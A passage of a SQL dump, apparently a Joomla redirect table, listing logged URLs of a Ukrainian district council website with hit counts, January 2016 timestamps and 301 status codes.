00:00:00',301),(24649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:-l-r-2011-2016-&Itemid=76&lang=uk','','','',1,0,'2016-01-10 13:40:10','0000-00-00 00:00:00',301),(24650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&Itemid=14&lang=ru','','','',1,0,'2016-01-10 13:40:13','0000-00-00 00:00:00',301),(24651,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=640:2012-04-03-12-44-22&Itemid=80&lang=uk','','','',1,0,'2016-01-10 13:40:13','0000-00-00 00:00:00',301),(24652,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=640:2012-04-03-12-44-22&Itemid=80&lang=ru','','','',1,0,'2016-01-10 13:40:13','0000-00-00 00:00:00',301),(24653,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=651:-2012-&catid=42:--16052012-&Itemid=80&lang=uk','','','',1,0,'2016-01-10 13:40:13','0000-00-00 00:00:00',301),(24654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=651:-2012-&catid=42&Itemid=80&lang=ru','','','',1,0,'2016-01-10 13:40:14','0000-00-00 00:00:00',301),(24655,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&lang=ru','','','',1,0,'2016-01-10 13:40:14','0000-00-00 00:00:00',301),(24656,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=676:2012-05-17-09-52-12&Itemid=80&lang=uk','','','',1,0,'2016-01-10 13:40:14','0000-00-00 00:00:00',301),(24657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=679:2012-05-17-10-00-53&catid=42&Itemid=80&lang=ru','','','',1,0,'2016-01-10 13:40:15','0000-00-00 00:00:00',301),(24658,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=683:------------------------2012-&Itemid=80&lang=ru','','','',1,0,'2016-01-10 13:40:17','0000-00-00 00:00:00',301),(24659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=683:------------------------2012-&Itemid=80&lang=uk','','','',1,0,'2016-01-10 13:40:17','0000-00-00 00:00:00',301),(24660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&Itemid=70&lang=ru','','','',1,0,'2016-01-10 13:40:18','0000-00-00 00:00:00',301),(24661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=712:2012-06-14-15-11-24&Itemid=82&lang=uk','','','',1,0,'2016-01-10 13:40:18','0000-00-00 00:00:00',301),(24662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=712:2012-06-14-15-11-24&Itemid=82&lang=ru','','','',1,0,'2016-01-10 13:40:18','0000-00-00 00:00:00',301),(24663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=719:-lr&catid=43&Itemid=82&lang=ru','','','',1,0,'2016-01-10 13:40:19','0000-00-00 00:00:00',301),(24664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=724:-27042012252&catid=43&Itemid=82&lang=ru','','','',1,0,'2016-01-10 13:40:41','0000-00-00 00:00:00',301),(24665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=uk','','','',1,0,'2016-01-10 13:40:43','0000-00-00 00:00:00',301),(24666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=uk','','','',1,0,'2016-01-10 13:40:43','0000-00-00 00:00:00',301),(24667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&Itemid=14&lang=uk','','','',1,0,'2016-01-10 13:40:44','0000-00-00 00:00:00',301),(24668,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=771:-2012-2015-&Itemid=84&lang=uk','','','',1,0,'2016-01-10 13:40:44','0000-00-00 00:00:00',301),(24669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&Itemid=84&lang=uk','','','',1,0,'2016-01-10 13:40:44','0000-00-00 00:00:00',301),(24670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&Itemid=14&lang=en','','','',1,0,'2016-01-10 13:40:45','0000-00-00 00:00:00',301),(24671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=789:-2012-2014-&Itemid=84&lang=ru','','','',1,0,'2016-01-10 13:40:46','0000-00-00 00:00:00',301),(24672,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&Itemid=84&lang=uk','','','',1,0,'2016-01-10 13:40:47','0000-00-00 00:00:00',301),(24673,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&Itemid=84&lang=ru','','','',1,0,'2016-01-10 13:40:51','0000-00-00 00:00:00',301),(24674,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&Itemid=84&lang=uk','','','',1,0,'2016-01-10 13:40:51','0000-00-00 00:00:00',301),(24675,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&Itemid=84&lang=ru','','','',1,0,'2016-01-10 13:40:51','0000-00-00 00:00:00',301),(24676,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=uk','','','',1,0,'2016-01-10 13:40:54','0000-00-00 00:00:00',301),(24677,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&Itemid=14&lang=ru','','','',1,0,'2016-01-10 13:40:54','0000-00-00 00:00:00',301),(24678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&Itemid=14&lang=uk','','','',1,0,'2016-01-10 13:40:54','0000-00-00 00:00:00',301),(24679,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&Itemid=88&lang=uk','','','',1,0,'2016-01-10 13:41:08','0000-00-00 00:00:00',301),(24680,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&Itemid=88&lang=ru','','','',1,0,'2016-01-10 13:41:08','0000-00-00 00:00:00',301),(24681,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&Itemid=85&lang=en','','','',1,0,'2016-01-10 13:41:09','0000-00-00 00:00:00',301),(24682,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&Itemid=85&lang=uk','','','',1,0,'2016-01-10 13:41:09','0000-00-00 00:00:00',301),(24683,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&lang=ru','','','',1,0,'2016-01-10 13:41:11','0000-00-00 00:00:00',301),(24684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&Itemid=64&lang=uk','','','',1,0,'2016-01-10 13:41:12','0000-00-00 00:00:00',301),(24685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=ru&limitstart=20','','','',1,0,'2016-01-10 13:42:13','0000-00-00 00:00:00',301),(24686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&Itemid=6&lang=uk','','','',1,0,'2016-01-10 13:42:20','0000-00-00 00:00:00',301),(24687,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=207:2010-12-15-14-22-39&catid=29:--15122010-&Itemid=60&lang=uk','','','',2,0,'2016-01-10 13:42:22','0000-00-00 00:00:00',301),(24688,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=209:2010-12-15-14-27-50&Itemid=60&lang=ru','','','',1,0,'2016-01-10 13:42:22','0000-00-00 00:00:00',301),(24689,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=209:2010-12-15-14-27-50&catid=29&Itemid=60&lang=uk','','','',1,0,'2016-01-10 13:42:22','0000-00-00 00:00:00',301),(24690,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=211:2010-12-15-14-46-24&catid=29&Itemid=60&lang=uk','','','',1,0,'2016-01-10 13:42:24','0000-00-00 00:00:00',301),(24691,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=229:-2011-&catid=30&Itemid=61&lang=uk','','','',1,0,'2016-01-10 13:42:24','0000-00-00 00:00:00',301),(24692,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=230:---3----6--30--2010-&Itemid=61&lang=ru','','','',1,0,'2016-01-10 13:42:25','0000-00-00 00:00:00',301),(24693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&Itemid=47&lang=uk','','','',1,0,'2016-01-10 13:42:25','0000-00-00 00:00:00',301),(24694,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=275:---------------2011-&catid=31&Itemid=62&lang=uk','','','',1,0,'2016-01-10 13:42:25','0000-00-00 00:00:00',301),(24695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=314:2011-05-20-13-01-00&Itemid=66&lang=uk','','','',2,0,'2016-01-10 13:42:25','0000-00-00 00:00:00',301),(24696,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=314:2011-05-20-13-01-00&catid=33:-20052011&Itemid=66&lang=uk','','','',1,0,'2016-01-10 13:42:26','0000-00-00 00:00:00',301),(24697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=318:-2007-2011&catid=33:-20052011&Itemid=66&lang=uk','','','',1,0,'2016-01-10 13:42:26','0000-00-00 00:00:00',301),(24698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=329:2011-05-20-16-25-10&catid=33:-20052011&Itemid=66&lang=ru','','','',1,0,'2016-01-10 13:42:27','0000-00-00 00:00:00',301),(24699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=344:2011-06-15-12-25-27&Itemid=68&lang=uk','','','',1,0,'2016-01-10 13:42:27','0000-00-00 00:00:00',301),(24700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=344:2011-06-15-12-25-27&catid=34&Itemid=68&lang=uk','','','',2,0,'2016-01-10 13:42:27','0000-00-00 00:00:00',301),(24701,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&Itemid=69&lang=ru','','','',1,0,'2016-01-10 13:42:28','0000-00-00 00:00:00',301),(24702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11&lang=uk','','','',1,0,'2016-01-10 13:42:29','0000-00-00 00:00:00',301),(24703,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&lang=ru','','','',1,0,'2016-01-10 13:42:30','0000-00-00 00:00:00',301),(24704,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&Itemid=73&lang=uk','','','',1,0,'2016-01-10 13:43:42','0000-00-00 00:00:00',301),(24705,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&Itemid=73&lang=en','','','',1,0,'2016-01-10 13:43:43','0000-00-00 00:00:00',301),(24706,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=509:2011-12-20-08-03-11&Itemid=73&lang=ru','','','',1,0,'2016-01-10 13:43:44','0000-00-00 00:00:00',301),(24707,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&Itemid=73&lang=uk','','','',1,0,'2016-01-10 13:43:44','0000-00-00 00:00:00',301),(24708,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&lang=ru','','','',1,0,'2016-01-10 13:43:45','0000-00-00 00:00:00',301),(24709,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=618:2012-03-29-08-39-48&Itemid=77&lang=ru','','','',1,0,'2016-01-10 13:43:46','0000-00-00 00:00:00',301),(24710,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=uk','','','',1,0,'2016-01-10 13:43:46','0000-00-00 00:00:00',301),(24711,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=621:-2012-&Itemid=77&lang=en','','','',1,0,'2016-01-10 13:43:46','0000-00-00 00:00:00',301),(24712,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=664:-------------l-r-lr&Itemid=78&lang=uk','','','',1,0,'2016-01-10 13:43:47','0000-00-00 00:00:00',301),(24713,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=665:-75-&catid=11&lang=uk','','','',1,0,'2016-01-10 13:43:47','0000-00-00 00:00:00',301),(24714,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=682:-2012-&Itemid=80&lang=uk','','','',1,0,'2016-01-10 13:43:47','0000-00-00 00:00:00',301),(24715,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&Itemid=14&lang=ru','','','',1,0,'2016-01-10 13:43:48','0000-00-00 00:00:00',301),(24716,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=710:2012-06-14-15-07-29&Itemid=82&lang=uk','','','',1,0,'2016-01-10 13:43:49','0000-00-00 00:00:00',301),(24717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=723:2012-06-18-14-29-08&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2016-01-10 13:43:52','0000-00-00 00:00:00',301),(24718,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&Itemid=70&lang=ru','','','',1,0,'2016-01-10 13:44:55','0000-00-00 00:00:00',301),(24719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&Itemid=70&lang=uk','','','',1,0,'2016-01-10 13:44:55','0000-00-00 00:00:00',301),(24720,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&Itemid=14&lang=uk','','','',1,0,'2016-01-10 13:44:56','0000-00-00 00:00:00',301),(24721,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&Itemid=14&lang=uk','','','',1,0,'2016-01-10 13:44:58','0000-00-00 00:00:00',301),(24722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&Itemid=88&lang=ru','','','',1,0,'2016-01-10 13:44:58','0000-00-00 00:00:00',301),(24723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&Itemid=88&lang=uk','','','',1,0,'2016-01-10 13:44:59','0000-00-00 00:00:00',301),(24724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&Itemid=88&lang=uk','','','',1,0,'2016-01-10 13:45:00','0000-00-00 00:00:00',301),(24725,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&Itemid=70&lang=uk','','','',1,0,'2016-01-10 13:45:06','0000-00-00 00:00:00',301),(24726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15&lang=ru','','','',1,0,'2016-01-10 13:45:09','0000-00-00 00:00:00',301),(24727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&Itemid=88&lang=ru','','','',1,0,'2016-01-10 13:45:10','0000-00-00 00:00:00',301),(24728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&Itemid=14&lang=ru','','','',1,0,'2016-01-10 13:45:10','0000-00-00 00:00:00',301),(24729,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&lang=ru','','','',1,0,'2016-01-10 13:45:11','0000-00-00 00:00:00',301),(24730,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=503:-2017-&catid=38&Itemid=73&lang=ru','','','',1,0,'2016-01-10 14:45:15','0000-00-00 00:00:00',301),(24731,'http://www.malyn-rayrada.org.ua/upload.php','','','',1,0,'2016-01-10 16:37:19','0000-00-00 00:00:00',301),(24732,'http://malyn-rayrada.org.ua/index.php?Itemid=105&id=58:--30042014-&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-01-10 17:01:11','0000-00-00 00:00:00',301),(24733,'http://malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=505:2011-12-16-13-24-32&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-10 17:01:13','0000-00-00 00:00:00',301),(24734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=562:-19122011194-30122011202&catid=39:-22022012-&Itemid=76&lang=en','','','',2,0,'2016-01-10 17:12:41','0000-00-00 00:00:00',301),(24735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&Itemid=14&lang=en','','','',1,0,'2016-01-10 20:03:09','0000-00-00 00:00:00',301),(24736,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=uk&limitstart=20','','','',1,0,'2016-01-10 20:03:16','0000-00-00 00:00:00',301),(24737,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=ru&limitstart=5','','','',1,0,'2016-01-10 20:03:28','0000-00-00 00:00:00',301),(24738,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&Itemid=42&lang=en','','','',1,0,'2016-01-10 20:04:11','0000-00-00 00:00:00',301),(24739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=208:2010-12-15-14-26-03&Itemid=60&lang=ru','','','',1,0,'2016-01-10 20:04:11','0000-00-00 00:00:00',301),(24740,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=209:2010-12-15-14-27-50&catid=29:--15122010-&Itemid=60&lang=uk','','','',1,0,'2016-01-10 20:04:11','0000-00-00 00:00:00',301),(24741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=328:2011-05-20-16-23-02&Itemid=66&lang=uk','','','',1,0,'2016-01-10 20:04:14','0000-00-00 00:00:00',301),(24742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&catid=33:-20052011&Itemid=66&lang=uk','','','',1,0,'2016-01-10 20:04:14','0000-00-00 00:00:00',301),(24743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=343:-2011-&Itemid=68&lang=ru','','','',1,0,'2016-01-10 20:04:14','0000-00-00 00:00:00',301),(24744,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=439:2011-10-21-16-22-19&Itemid=72&lang=uk','','','',1,0,'2016-01-10 20:04:42','0000-00-00 00:00:00',301),(24745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=439:2011-10-21-16-22-19&Itemid=72&lang=ru','','','',1,0,'2016-01-10 20:04:42','0000-00-00 00:00:00',301),(24746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=440:2011-10-21-16-24-47&catid=37&Itemid=72&lang=uk','','','',1,0,'2016-01-10 20:04:42','0000-00-00 00:00:00',301),(24747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=444:2011-10-24-07-04-45&catid=37&Itemid=72&lang=uk','','','',1,0,'2016-01-10 20:04:42','0000-00-00 00:00:00',301),(24748,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=554:-l-r&Itemid=76&lang=en','','','',1,0,'2016-01-10 20:04:45','0000-00-00 00:00:00',301),(24749,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=642:2012-04-03-12-53-05&catid=32&Itemid=64&lang=uk','','','',1,0,'2016-01-10 20:04:52','0000-00-00 00:00:00',301),(24750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&Itemid=14&lang=ru','','','',1,0,'2016-01-10 20:04:52','0000-00-00 00:00:00',301),(24751,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&lang=en','','','',1,0,'2016-01-10 20:04:52','0000-00-00 00:00:00',301),(24752,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=681:16-13-&catid=11&lang=uk','','','',1,0,'2016-01-10 20:04:52','0000-00-00 00:00:00',301),(24753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=688:2012-05-25-16-34-51&lang=ru','','','',1,0,'2016-01-10 20:04:53','0000-00-00 00:00:00',301),(24754,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=696:-14-6-&Itemid=14&lang=uk','','','',1,0,'2016-01-10 20:04:53','0000-00-00 00:00:00',301),(24755,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=700:-2012-2015-&Itemid=82&lang=uk','','','',1,0,'2016-01-10 20:04:53','0000-00-00 00:00:00',301),(24756,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&Itemid=86&lang=ru','','','',1,0,'2016-01-10 20:04:54','0000-00-00 00:00:00',301),(24757,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=723:2012-06-18-14-29-08&catid=43&Itemid=82&lang=ru','','','',1,0,'2016-01-10 20:04:55','0000-00-00 00:00:00',301),(24758,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&lang=en','','','',1,0,'2016-01-10 20:04:57','0000-00-00 00:00:00',301),(24759,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=737:2012-07-18-13-36-46&Itemid=82&lang=ru','','','',1,0,'2016-01-10 20:04:57','0000-00-00 00:00:00',301),(24760,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&Itemid=82&lang=ru','','','',1,0,'2016-01-10 20:04:57','0000-00-00 00:00:00',301),(24761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2016-01-10 20:04:59','0000-00-00 00:00:00',301),(24762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&lang=ru','','','',1,0,'2016-01-10 20:05:30','0000-00-00 00:00:00',301),(24763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&lang=en','','','',1,0,'2016-01-10 20:05:31','0000-00-00 00:00:00',301),(24764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&Itemid=14&lang=uk','','','',1,0,'2016-01-10 20:05:34','0000-00-00 00:00:00',301),(24765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=822:----------2012--2013-----------------l-r&Itemid=84&lang=en','','','',1,0,'2016-01-10 20:05:35','0000-00-00 00:00:00',301),(24766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=823:2012-11-14-16-52-28&Itemid=84&lang=ru','','','',1,0,'2016-01-10 20:05:35','0000-00-00 00:00:00',301),(24767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&Itemid=85&lang=ru','','','',1,0,'2016-01-10 20:05:39','0000-00-00 00:00:00',301),(24768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&Itemid=85&lang=uk','','','',1,0,'2016-01-10 20:05:39','0000-00-00 00:00:00',301),(24769,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&Itemid=14&lang=uk','','','',1,0,'2016-01-10 20:05:42','0000-00-00 00:00:00',301),(24770,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&lang=en','','','',1,0,'2016-01-10 20:05:42','0000-00-00 00:00:00',301),(24771,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&Itemid=85&lang=uk','','','',1,0,'2016-01-10 20:05:43','0000-00-00 00:00:00',301),(24772,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/504-pro-pogodzhennja-statusu-malinskoi-ditjachoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:53:03','0000-00-00 00:00:00',301),(24773,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/508-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:53:24','0000-00-00 00:00:00',301),(24774,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/363-pro-vnesennja-zmin-do-programi-zajnjatosti','','','',6,0,'2016-01-10 20:53:54','0000-00-00 00:00:00',301),(24775,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/376-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:54:19','0000-00-00 00:00:00',301),(24776,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/377-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi_3','','','',5,0,'2016-01-10 20:54:22','0000-00-00 00:00:00',301),(24777,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/383-pro-zamishhennja-deputata-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:54:34','0000-00-00 00:00:00',301),(24778,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/384-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi_2','','','',5,0,'2016-01-10 20:54:37','0000-00-00 00:00:00',301),(24779,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/393-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_8','','','',5,0,'2016-01-10 20:54:40','0000-00-00 00:00:00',301),(24780,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/394-pro-deputatskij-zapit-deputata-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:54:47','0000-00-00 00:00:00',301),(24781,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/395-pro-zvernennja-do-nachalnika-sluzhbi-avtomobilnih?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:54:52','0000-00-00 00:00:00',301),(24782,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/396-pro-pogodzhennja-priznachennja-na-posadu-direktora_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:54:55','0000-00-00 00:00:00',301),(24783,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/400-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:55:06','0000-00-00 00:00:00',301),(24784,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/766-pro-pogodzhennja-priznachennja-na-posadu-direktora_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:56:02','0000-00-00 00:00:00',301),(24785,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/819-pro-vnesennja-zmin-do-rajonnih-program','','','',5,0,'2016-01-10 20:56:34','0000-00-00 00:00:00',301),(24786,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/601-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 20:58:03','0000-00-00 00:00:00',301),(24787,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/602-pro-hid-vikonannja-rajonnoi-socialnoi-programi_2','','','',5,0,'2016-01-10 20:58:07','0000-00-00 00:00:00',301),(24788,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/135-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 21:01:39','0000-00-00 00:00:00',301),(24789,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/136-pro-zatverdzhennja-rajonnoi-programi-rozvitku','','','',5,0,'2016-01-10 21:01:44','0000-00-00 00:00:00',301),(24790,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/175-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_5','','','',5,0,'2016-01-10 21:01:47','0000-00-00 00:00:00',301),(24791,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=546:-l-r-&catid=39&Itemid=76&lang=ru','','','',2,0,'2016-01-10 21:07:57','0000-00-00 00:00:00',301),(24792,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1070-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-ukrajinkivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:21:20','0000-00-00 